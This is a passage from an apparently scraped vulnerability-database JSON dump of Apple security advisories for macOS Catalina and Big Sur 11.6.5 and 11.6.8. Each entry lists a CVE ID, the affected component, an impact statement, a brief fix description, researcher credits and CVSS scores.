2022\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22631: Wang Yu of cyberserval\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to read restricted memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\n**BOM**\n\nAvailable for: macOS Catalina\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**CUPS**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26691: Joshua Mason of Mandiant\n\nEntry added May 25, 2022\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-22661: an anonymous researcher, Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry updated May 25, 2022\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: an anonymous researcher, Alex\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22615: an anonymous researcher\n\nCVE-2022-22614: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Catalina\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Login Window**\n\nAvailable for: macOS Catalina\n\nImpact: A person with access to a Mac may be able to bypass Login Window\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22647: Yuto Ikeda of Kyushu University\n\nEntry updated May 25, 2022\n\n**LoginWindow**\n\nAvailable for: macOS Catalina\n\nImpact: A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22656\n\n**MobileAccessoryUpdater**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Catalina\n\nImpact: A malicious app with root privileges may be able to modify the contents of system files\n\nDescription: An issue in the handling of symlinks was addressed with improved validation.\n\nCVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Catalina\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\n**QuickTime Player**\n\nAvailable for: macOS Catalina\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**WebKit**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Catalina\n\nImpact: Processing a maliciously crafted mail message may lead to running arbitrary javascript\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2022-22589: Heige of KnownSec 404 Team (knownsec.com) and Bo Qu of Palo Alto Networks (paloaltonetworks.com)\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Catalina\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**xar**\n\nAvailable for: macOS Catalina\n\nImpact: A local user may be able to write arbitrary files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2022-22582: Richard Warren of NCC Group\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**TCC**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 25, 2022\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of Security Update 2022-003 Catalina", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582", "CVE-2022-22589", "CVE-2022-22597", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22665", "CVE-2022-22672", "CVE-2022-26688", "CVE-2022-26691"], "modified": "2022-03-14T00:00:00", "id": "APPLE:A07531C05C19836B4B65E06C7D7BB300", "href": "https://support.apple.com/kb/HT213185", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-30T14:52:21", "description": "# About the security content of macOS Big Sur 11.6.5\n\nThis document describes the security content of macOS Big Sur 11.6.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS Big Sur 11.6.5\n\nReleased March 14, 2022\n\n**Accelerate Framework**\n\nAvailable for: macOS Big Sur\n\nImpact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2022-22633: ryuzaki\n\nEntry updated May 25, 2022\n\n**AppKit**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2022-22665: Lockheed Martin Red Team\n\nEntry added May 25, 2022\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22631: Wang Yu of cyberserval\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to read restricted memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22648: Mickey Jin (@patch1t) of Trend Micro\n\nEntry updated May 25, 2022\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2022-22627: Qi Sun and Robert Ai of Trend Micro\n\nCVE-2022-22626: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2022-22625: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-22597: Qi Sun and Robert Ai of Trend Micro\n\n**BOM**\n\nAvailable for: macOS Big Sur\n\nImpact: A maliciously crafted ZIP archive may bypass Gatekeeper checks\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22616: Ferdous Saljooki (@malwarezoo) and Jaron Bradley (@jbradley89) of Jamf Software, Mickey Jin (@patch1t)\n\n**CUPS**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-26691: Joshua Mason of Mandiant\n\nEntry added May 25, 2022\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-22661: an anonymous researcher, Pan ZhenPeng (@Peterpan0927) of Alibaba Security Pandora Lab\n\nEntry updated May 25, 2022\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22613: Alex, an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2022-22615: an anonymous researcher\n\nCVE-2022-22614: an anonymous researcher\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-22638: derrek (@derrekr6)\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22632: Keegan Saunders\n\n**Login Window**\n\nAvailable for: macOS Big Sur\n\nImpact: A person with access to a Mac may be able to bypass Login Window\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22647: Yuto Ikeda of Kyushu University\n\nEntry updated May 25, 2022\n\n**LoginWindow**\n\nAvailable for: macOS Big Sur\n\nImpact: A local attacker may be able to view the previous logged in user\u2019s desktop from the fast user switching screen\n\nDescription: An authentication issue was addressed with improved state management.\n\nCVE-2022-22656\n\n**MobileAccessoryUpdater**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2022-22672: Siddharth Aeri (@b1n4r1b01)\n\nEntry added May 25, 2022\n\n**PackageKit**\n\nAvailable for: macOS Big Sur\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-22617: Mickey Jin (@patch1t)\n\n**PackageKit**\n\nAvailable for: macOS Big Sur\n\nImpact: A malicious app with root privileges may be able to modify the contents of system files\n\nDescription: An issue in the handling of symlinks was addressed with improved validation.\n\nCVE-2022-26688: Mickey Jin (@patch1t) of Trend Micro\n\nEntry added May 25, 2022\n\n**QuickTime Player**\n\nAvailable for: macOS Big Sur\n\nImpact: A plug-in may be able to inherit the application's permissions and access user data\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-22650: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Siri**\n\nAvailable for: macOS Big Sur\n\nImpact: A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen\n\nDescription: A permissions issue was addressed with improved validation.\n\nCVE-2022-22599: Andrew Goldberg of the University of Texas at Austin, McCombs School of Business (linkedin.com/andrew-goldberg-/)\n\nEntry updated May 25, 2022\n\n**SMB**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-22651: Felix Poulin-Belanger\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\nEntry added May 25, 2022\n\n**WebKit**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may disclose sensitive user information\n\nDescription: A cookie management issue was addressed with improved state management.\n\nWebKit Bugzilla: 232748 \nCVE-2022-22662: Prakash (@1lastBr3ath) of Threat Nix\n\n**xar**\n\nAvailable for: macOS Big Sur\n\nImpact: A local user may be able to write arbitrary files\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks.\n\nCVE-2022-22582: Richard Warren of NCC Group\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Intel Graphics Driver**\n\nWe would like to acknowledge Jack Dates of RET2 Systems, Inc., Yinyi Wu (@3ndy1) for their assistance.\n\n**syslog**\n\nWe would like to acknowledge Yonghwi Jin (@jinmo123) of Theori for their assistance.\n\n**TCC**\n\nWe would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: May 25, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.6.5", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22582", "CVE-2022-22597", "CVE-2022-22599", "CVE-2022-22613", "CVE-2022-22614", "CVE-2022-22615", "CVE-2022-22616", "CVE-2022-22617", "CVE-2022-22625", "CVE-2022-22626", "CVE-2022-22627", "CVE-2022-22631", "CVE-2022-22632", "CVE-2022-22633", "CVE-2022-22638", "CVE-2022-22647", "CVE-2022-22648", "CVE-2022-22650", "CVE-2022-22651", "CVE-2022-22656", "CVE-2022-22661", "CVE-2022-22662", "CVE-2022-22665", "CVE-2022-22672", "CVE-2022-26688", "CVE-2022-26691"], "modified": "2022-03-14T00:00:00", "id": "APPLE:8BB162E4A512616135B4203D7F1AA9CD", "href": "https://support.apple.com/kb/HT213184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-09T21:58:49", "description": "# About the security content of macOS Big Sur 11.6.8\n\nThis document describes the security content of macOS Big Sur 11.6.8.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS Big Sur 11.6.8\n\nReleased July 20, 2022\n\n**APFS**\n\nAvailable for: macOS Big Sur\n\nImpact: An app with root privileges may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32832: Tommy Muir (@Muirey03)\n\n**AppleMobileFileIntegrity**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to gain root privileges\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2022-32826: Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32797: Mickey Jin (@patch1t), Ye Zhang (@co0py_Cat) of Baidu Security, Mickey Jin (@patch1t) of Trend Micro\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved input validation.\n\nCVE-2022-32853: Ye Zhang (@co0py_Cat) of Baidu Security\n\nCVE-2022-32851: Ye Zhang (@co0py_Cat) of Baidu Security\n\n**AppleScript**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted AppleScript binary may result in unexpected termination or disclosure of process memory\n\nDescription: An out-of-bounds read issue was addressed with improved bounds checking.\n\nCVE-2022-32831: Ye Zhang (@co0py_Cat) of Baidu Security\n\n**Archive Utility**\n\nAvailable for: macOS Big Sur\n\nImpact: An archive may be able to bypass Gatekeeper\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32910: Ferdous Saljooki (@malwarezoo) of Jamf Software\n\nEntry added October 4, 2022\n\n**Audio**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to disclose kernel memory\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32825: John Aakerblom (@jaakerblom)\n\n**Audio**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2022-32820: an anonymous researcher\n\n**Calendar**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to access sensitive user information\n\nDescription: The issue was addressed with improved handling of caches.\n\nCVE-2022-32805: Csaba Fitzl (@theevilbit) of Offensive Security\n\n**Calendar**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to access user-sensitive data\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2022-32849: Joshua Jones\n\n**CoreText**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote user may cause an unexpected app termination or arbitrary code execution\n\nDescription: The issue was addressed with improved bounds checks.\n\nCVE-2022-32839: STAR Labs (@starlabs_sg)\n\n**FaceTime**\n\nAvailable for: macOS Big Sur\n\nImpact: An app with root privileges may be able to access private information\n\nDescription: This issue was addressed by enabling hardened runtime.\n\nCVE-2022-32781: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**File System Events**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to gain root privileges\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32819: Joshua Mason of Mandiant\n\n**ICU**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-32787: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.\n\n**ImageIO**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing an image may lead to a denial-of-service\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2022-32785: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32812: Yinyi Wu (@3ndy1), ABC Research s.r.o.\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2022-32811: ABC Research s.r.o\n\n**Kernel**\n\nAvailable for: macOS Big Sur\n\nImpact: An app with root privileges may be able to execute arbitrary code with kernel privileges\n\nDescription: The issue was addressed with improved memory handling.\n\nCVE-2022-32815: Xinru Chi of Pangu Lab\n\nCVE-2022-32813: Xinru Chi of Pangu Lab\n\n**libxml2**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to leak sensitive user information\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2022-32823\n\n**Multi-Touch**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2022-32814: Pan ZhenPeng(@Peterpan0927)\n\nEntry added November 9, 2022\n\n**Multi-Touch**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2022-32814: Pan ZhenPeng(@Peterpan0927)\n\nEntry added November 9, 2022\n\n**PackageKit**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to modify protected parts of the file system\n\nDescription: An issue in the handling of environment variables was addressed with improved validation.\n\nCVE-2022-32786: Mickey Jin (@patch1t)\n\n**PackageKit**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to modify protected parts of the file system\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32800: Mickey Jin (@patch1t)\n\n**PluginKit**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to read arbitrary files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2022-32838: Mickey Jin (@patch1t) of Trend Micro\n\n**PS Normalizer**\n\nAvailable for: macOS Big Sur\n\nImpact: Processing a maliciously crafted Postscript file may result in unexpected app termination or disclosure of process memory\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2022-32843: Kai Lu of Zscaler's ThreatLabz\n\n**Software Update**\n\nAvailable for: macOS Big Sur\n\nImpact: A user in a privileged network position can track a user\u2019s activity\n\nDescription: This issue was addressed by using HTTPS when sending information over the network.\n\nCVE-2022-32857: Jeffrey Paul (sneak.berlin)\n\n**Spindump**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to overwrite arbitrary files\n\nDescription: This issue was addressed with improved file handling.\n\nCVE-2022-32807: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab\n\n**Spotlight**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to gain elevated privileges\n\nDescription: A validation issue in the handling of symlinks was addressed with improved validation of symlinks.\n\nCVE-2022-26704: Joshua Mason of Mandiant\n\n**TCC**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to access sensitive user information\n\nDescription: An access issue was addressed with improvements to the sandbox.\n\nCVE-2022-32834: Xuxiang Yang (@another1024) of Tencent Security Xuanwu Lab (xlab.tencent.com), Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com), Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)\n\nEntry updated September 16, 2022\n\n**Vim**\n\nAvailable for: macOS Big Sur\n\nImpact: Multiple issues in Vim\n\nDescription: Multiple issues were addressed by updating Vim.\n\nCVE-2022-0156\n\nCVE-2022-0158\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2022-32860: Wang Yu of Cyberserval\n\nEntry added November 9, 2022\n\n**Wi-Fi**\n\nAvailable for: macOS Big Sur\n\nImpact: A remote user may be able to cause unexpected system termination or corrupt kernel memory\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2022-32847: Wang Yu of Cyberserval\n\n**Windows Server**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to capture a user\u2019s screen\n\nDescription: A logic issue was addressed with improved checks.\n\nCVE-2022-32848: Jeremy Legendre of MacEnhance\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Calendar**\n\nWe would like to acknowledge Joshua Jones for their assistance.\n\nEntry added November 9, 2022\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 09, 2022\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.6.8", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0156", "CVE-2022-0158", "CVE-2022-26704", "CVE-2022-32781", "CVE-2022-32785", "CVE-2022-32786", "CVE-2022-32787", "CVE-2022-32797", "CVE-2022-32800", "CVE-2022-32805", "CVE-2022-32807", "CVE-2022-32811", "CVE-2022-32812", "CVE-2022-32813", "CVE-2022-32814", "CVE-2022-32815", "CVE-2022-32819", "CVE-2022-32820", "CVE-2022-32823", "CVE-2022-32825", "CVE-2022-32826", "CVE-2022-32831", "CVE-2022-32832", "CVE-2022-32834", "CVE-2022-32838", "CVE-2022-32839", "CVE-2022-32843", "CVE-2022-32847", "CVE-2022-32848", "CVE-2022-32849", "CVE-2022-32851", "CVE-2022-32853", "CVE-2022-32857", "CVE-2022-32860", "CVE-2022-32910"], "modified": "2022-07-20T00:00:00", "id": "APPLE:AC49D86768B40C9859AF7DC3073E5DAF", "href": "https://support.apple.com/kb/HT213344", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-04T21:58:45", "description": "# About the security content of Security Update 2022-005 Catalina\n\nThis document describes the security content of Security Update 2022-005 Catalina.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, 